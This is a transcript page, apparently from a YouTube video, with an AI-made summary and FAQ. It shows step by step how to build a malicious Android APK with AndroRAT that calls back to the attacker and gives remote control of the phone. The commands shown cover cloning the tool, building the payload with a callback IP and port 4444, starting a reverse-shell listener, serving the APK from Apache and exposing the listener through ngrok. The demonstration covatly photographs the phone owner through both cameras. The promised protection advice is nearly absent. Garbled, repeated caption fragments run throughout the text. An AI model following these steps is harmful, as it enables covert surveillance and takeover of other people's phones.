watch how Hackers Remotely Control Any phone?! protect … — Transcript

Learn how hackers remotely control Android phones using AndroRAT and how to protect your device from such attacks.

Key Takeaways

  • AndroRAT can be used to remotely control Android devices by creating and distributing a malicious APK.
  • Setting up the environment requires cloning from GitHub, installing dependencies, and configuring IP and port.
  • Hosting the malicious APK on a web server allows attackers to deliver it to victims.
  • Using such hacking techniques is illegal and can lead to being tracked and identified.
  • Users should be vigilant and take steps to protect their phones from remote hacking threats.

Summary

  • The video demonstrates hacking Android devices remotely using AndroRAT software.
  • It explains how to build a malicious APK file that can be sent to target devices.
  • The tutorial uses Kali Linux as the preferred hacking OS but mentions compatibility with others.
  • Instructions include cloning the AndroRAT repository from GitHub and installing dependencies.
  • The process involves setting the IP address and port to create and host the malicious APK.
  • The video shows how to start a listener to receive connections from compromised devices.
  • It covers hosting the APK on a local or internet-accessible web server using Apache.
  • The creator warns against illegal use and promises to track anyone attempting to hack him.
  • Viewers are encouraged to subscribe and enable notifications to stay informed about phone security.
  • The tutorial highlights the simplicity and dangers of remote hacking tools like AndroRAT.

Full Transcript — Download SRT & Markdown

00:00
Speaker A
Yes, in today's tutorial, you'll learn how you can hack into any Android devices across the internet. So if you watch to the end, I'll show you how we can. One, of course, is to host it locally, and second is to host this hacking software across the internet so they can remotely control any of these Android devices. And because of how easy it is to run any of this hacking software across the internet, if you get caught hacking, do not tell them that you know who is Hacker Lawyer. And if you try to use this hacking technique on me by sending the file over to me, I promise you I will find you. I will get your IP address, I'll get your location, and I'll know exactly who you are. Smash the like button and turn on notifications for the subscription so that you don't get hacked.
00:10
Speaker A
is to host this hacking software across the internet so they can remotely control any of these android devices and because of how easy it is to run any of this hacking software across the internet if you get caught hacking do
00:21
Speaker A
So right in front of us, I'm on Kali Linux, which is our preferred hacking operating system, but technically you can run it on any of your favorite OS because whichever the case is, the whole idea is as long as you can run AndroRAT there, you'll be able to host your hacking listener. You can build the malicious APK file, which can then be sent over to a target computer or device, and then after which it gives you complete control of the devices. So here in front of us, I'm on Android.
00:30
Speaker A
get your location and i'll know exactly who you are smash the like button and turn on notification for the subscription so that you don't get hacked [Music] so right in front of us i'm on call linux which is our preferred hacking
00:56
Speaker A
All right, so here you can see the following. Okay, so this helps us build the malicious APK file that we can send over to a target machine or a target device. And once the user downloads and installs that specific APK file, that's it. It's game over, literally, and it's crazily easy to do. So what you can do here is you can go over to the top right corner, all right, of GitHub, and you can go ahead and copy and go ahead and open up a new terminal. All right, so let's go ahead and do a simple git clone followed by the pasting of the link and go ahead and hit enter on this.
01:07
Speaker A
malicious apk file which can then be sent over a target computer or device and then after which it gives you complete control of the devices so here in front of us i'm on android all right so here you can see the following okay
01:19
Speaker A
So it says the following: pulling into AndroRAT, and you can see the following. All right, you can see all these different details and information. So all you're going to do next is just cd into AndroRAT. You can see ls over here, so we have android.py, which is a Python file for us to run. And what we can do now is to go ahead and see if there are any other dependencies that we can install alongside with it to ensure we have a working copy of AndroRAT so that we can create a malicious APK file as quickly as we possibly can.
01:35
Speaker A
do so so what you can do here is you can go over to the top right corner all right of github and you can go ahead and copy and go ahead and open up a new terminal all right so let's go ahead and
01:46
Speaker A
So what we can do now is go ahead and enter the following, which is the pip or install, all right, dash r followed by the requirements.txt. So go ahead and hit enter on this, and it will check for all those requirements. And of course, you can always do a cat requirements.txt, and you can see the following. All right, so we need A, and ngrok, I like Caller AMA. All right, so all these are different requirements that we can have in order for the insurance or the assurance that we can install and run AndroRAT.
01:54
Speaker A
these different details and information so all you're going to do next is just cd into android you can see ls over here so we have android dot py which is a python file for us to run and what we can do now is to go ahead
02:07
Speaker A
So what we want to do now is to go ahead and create a malicious APK file. All right, so what you can do is go ahead and enter python3, all right, followed by android.py and double dash build followed by dash i. And dash i is for the IP address they'll be using. So in this case, 192.168.0.182. So this is the IP address of Kali Linux machine. I mean, if you don't believe me, you can just go ahead and open up a new terminal or and go ahead and enter ifconfig so that this will show you the IP address of your existing machine that you have. So in this case with 192.168.0.1.
02:18
Speaker A
is go ahead and enter the following which is the pip or install all right dash r followed by the requirements.txt so go ahead and hit enter on this and it will check for all those requirements and of course you can always do a cat
02:31
Speaker A
So jumping back to the earlier terminal, all right, what we can do next is enter dash p for the port number. So in this case, let's use 4444 as the port number. So whatever the case is, you can use any port numbers that you want so that you will be able to connect back over into the listener of AndroRAT. So what we can do next is we can, of course, also output the file name. So in this case, we can enter dash o followed by hackerloy.apk.
02:45
Speaker A
install and run android so what we want to do now is to go ahead and create a malicious apk file all right so what you can do is go ahead and enter python3 all right followed by android okay dot py
02:56
Speaker A
So with that, it's a very simple command. Go ahead and hit enter on this, and you can see right here we have generating the APK, building the APK file, and you can see right here successfully APK built in the following directory and then successfully signed the APK hackerloy.apk. So you can enter ls -l, and you can see right here, right? So I can enter ls -lt, and you can see hackerloy.apk has been created successfully.
03:08
Speaker A
open up a new terminal or and go ahead and enter ifconfig so that this will show you the ip address of your existing machine that you have so in this case with 192 168.0.1 so jumping back to the earlier terminal
03:20
Speaker A
So with the file created successfully, now what we can do is to go ahead and host the listener. So in order to host the listener, all you got to do is enter python3 once again followed by androRAT.py and then, of course, double dash shell dash i 0.0.0.0 followed by the port number of 4444 that we said earlier. So go ahead and hit enter on this. So it says the following: waiting for connection.
03:30
Speaker A
will be able right to connect back over into the listener of android so what we can do next is we can of course also output the file name so in this case we can enter dasho followed by hackerloy.apk
03:42
Speaker A
So now what we can do is jumping back to another terminal. What we can do now is enter sudo systemctl and go ahead and enter status apache2.service. So if you do not have an application web server that is currently running serving the file, you can easily use this instruction to start it up by entering sudo systemctl start apache2.service, and this will help start up the Apache, which is our HTTP server, so that we can host the file over onto the internet or, of course, over onto your local network.
03:54
Speaker A
then successfully signed the apk hackerlog.apk so you can enter ls-l and you can see right here right so i can enter ls-lt and you can see hackerlog.apk has been created successfully so with the file created successfully now what we can do is to go
04:08
Speaker A
So what I can do now is to go ahead and copy the file. So let's cd over into android, and what we can do now is do a sudo copy hackerloy.apk to var www html. Hit enter on this, and this will help us copy the file over into the web application server directory, and then after which we can easily send it over to the user.
04:19
Speaker A
0.0.0.0 followed by the port number of 444 that we said earlier so go ahead and hit enter on this so it stays the falling waiting for connection so now what we can do is jumping back to another terminal what we can do now is
04:31
Speaker A
So what I can do now is I can head over into any Android devices that we have. So go ahead and open up, say, like a browser like Chrome, and of course we can enter the IP address 192.168.0.182 hackerloy.apk. Hit enter on this, and this will begin downloading the APK file. Click open. All right, do you want to install this application? Click install, right? And of course, when you click open, you can see the following. We just choose what to allow, and by default, everyone will just click OK.
04:47
Speaker A
startapig2.service and this will help startup the apigee which is our http server so that we can host the file over onto the internet or of course over onto your local network so what i can do now is to go ahead and copy the file so
05:01
Speaker A
And once we jump back to the earlier terminal with our listener, you see right here: hello there, welcome to reverse shell of Android SDK built for x86. And this means we are in. It's game over, as simple as that. And all I got to do is enter help, and we can see the following. All these are the different instructions and commands that we can send over to the device.
05:15
Speaker A
easily send it over to the user so what i can do now is i can head over into and any android devices that we have so go ahead and open up say like a browse like chrome and of course we can enter the ip
05:26
Speaker A
So I can enter a cam list. I hit enter on this, and we can see the following. We have back camera and front camera, and all I got to do is enter tick pick, and I enter zero, and you can see the following: taking image successfully saved in the phone. This is crazy stuff.
05:43
Speaker A
choose what to allow and by default everyone will just click ok and once we jump back to the earlier terminal with our listener you see right here hello there welcome to reverse shell of android sdk built for x86
05:56
Speaker A
So let's go over to our folder. All right, open folder, and let's jump right over into android doms, and you can see the image right here. Double clicked on it. This is the image that we've taken from the phone.
06:06
Speaker A
the device so i can enter a cam list i hit enter on this and we can see the following we have back camera and front camera and all i got to do is enter tick pick and i enter zero and you can see
06:16
Speaker A
So if I jump back over into the phone over here, and I go under camera, all right, so let's go ahead and click on the camera, and you can see right here. Okay, so if I was to switch up the camera, and you can see over here, this is the camera that we managed to take a photo of because we have complete control of the mobile device. Thank you.
06:30
Speaker A
on it this is the image that we've taken from the phone so if i jump back over into the phone over here and i go under camera all right so let's go ahead and click on the camera and you can see
06:41
Speaker A
So much for sharing with us, Mr. Hackerloy. Is it possible for us to host this hacking software across the internet? Yes, absolutely. We can use a tool like ngrok. So let me show you just that. So all we got to do now is go ahead and launch ngrok. So here you can enter ./ngrok followed by the protocol, in this case TCP, and of course we can enter the port of 4444. Hit enter on this.
06:53
Speaker A
so much for sharing with us mr hackaloy is it possible for us to host this hacking software across the internet yes absolutely we can use a tool like ngrok so let me show you just that so all we
07:02
Speaker A
So we can see the following, which is that we have the forwarding, which is 2.tcp.ngrok.io and port 11684. All right, so do take note of this when we're creating the APK file.
07:13
Speaker A
this so we can see the following which is that we have the forwarding which is two dot tcp dot ng rock dot io and port one one six eight four all right so do take note of this when we're creating
07:24
Speaker A
So jumping over into a new terminal, what I can do now is go ahead and, of course, enter python3 followed by the android.py, and now we want to go back to butte, and in this case when we enter dash i, we want to specify the following, which is in this cas...
07:36
Speaker A
enter dash i we want to specify the following which is in this case of course you can see 2 dot tcp.ngroc.io and port of 11684 okay so we're creating a new file here and of course in this case our output to hackerlaw.apk hit
07:51
Speaker A
enter on that generating apk building apk and after that we'll do the signing and that's it done so we have created the apk file all right so all we got to do now is go back into copying the file so do a sudo
08:04
Speaker A
copy hacker line.apk to var www.html slash hit enter on that so we've done a new copy of the new version of heckle.apk jump back over into the mobile device go over into the link which is 182.168.0.1i2 all right followed by slash
08:20
Speaker A
hackerloid.apk hit enter on that and we can see the following do you want download file click download all right so once the file has completed the download go ahead and click open up click install one more time all right
08:31
Speaker A
click before we click open we go to set up the listener so let's pause that for a second so what we can do now is go ahead and enter python3 all right android and then followed by desja shell followed by
08:42
Speaker A
i 0.0.0.0 followed by dash p pod four four four four hit enter on this and it stays falling waiting for connection so now that we're waiting for connections i jump back over into the device all i gotta do is click open in three two one
08:55
Speaker A
click open click continue click ok and you can see right here hello there welcome to reverse shell of android sdk but for x86 if i move over into the earlier terminal of ngrok you can see right here we have one open connection
09:10
Speaker A
so this means that we're able to host our hacking server across the internet and the same thing will happen i can enter help okay and i can see the list of commands that we can send over to the
09:18
Speaker A
device i can enter for example cam list again in this time brow send and target a different camera so i can enter tick pick one hit enter on that and you can see the following right taking image successfully saved in the following so
09:32
Speaker A
this is crazy we just took another photo of the phone open up folder go to android go into dumps and you can see double clicked on it and you can see the image right here this is the image that
09:43
Speaker A
we've taken from the camera i mean if you don't believe me just go back over into the device go back into camera right here so click on the camera and what i can do now is switch back over
09:52
Speaker A
all right to the front camera and can see the camera showing us the information right here as quickly as that we have full complete control of the entire mobile device by just sending over an apk file and that's it it's game
10:03
Speaker A
over full control of the entire mobile device so like share subscribe and turn on notifications so that you can become a brass of the latest article hacking tutorials
Topics:Android hackingAndroRATremote phone controlmalicious APKKali Linuxphone securityhacking tutorialcybersecurityhack protectionethical hacking

Frequently Asked Questions

What is AndroRAT and how is it used in this video?

AndroRAT is a remote administration tool for Android devices. The video shows how to clone its repository, build a malicious APK, and use it to remotely control Android phones.

What operating system is recommended for running the hacking software?

Kali Linux is recommended as the preferred operating system for running AndroRAT, though it can technically run on other OSes that support the required dependencies.

How can the malicious APK be hosted for distribution?

The APK can be hosted on a local or internet-accessible web server, such as Apache, by copying the file to the web server's directory and starting the service to serve the file.

Get More with the Söz AI App

Transcribe recordings, audio files, and YouTube videos — with AI summaries, speaker detection, and unlimited transcriptions.

Or transcribe another YouTube video here →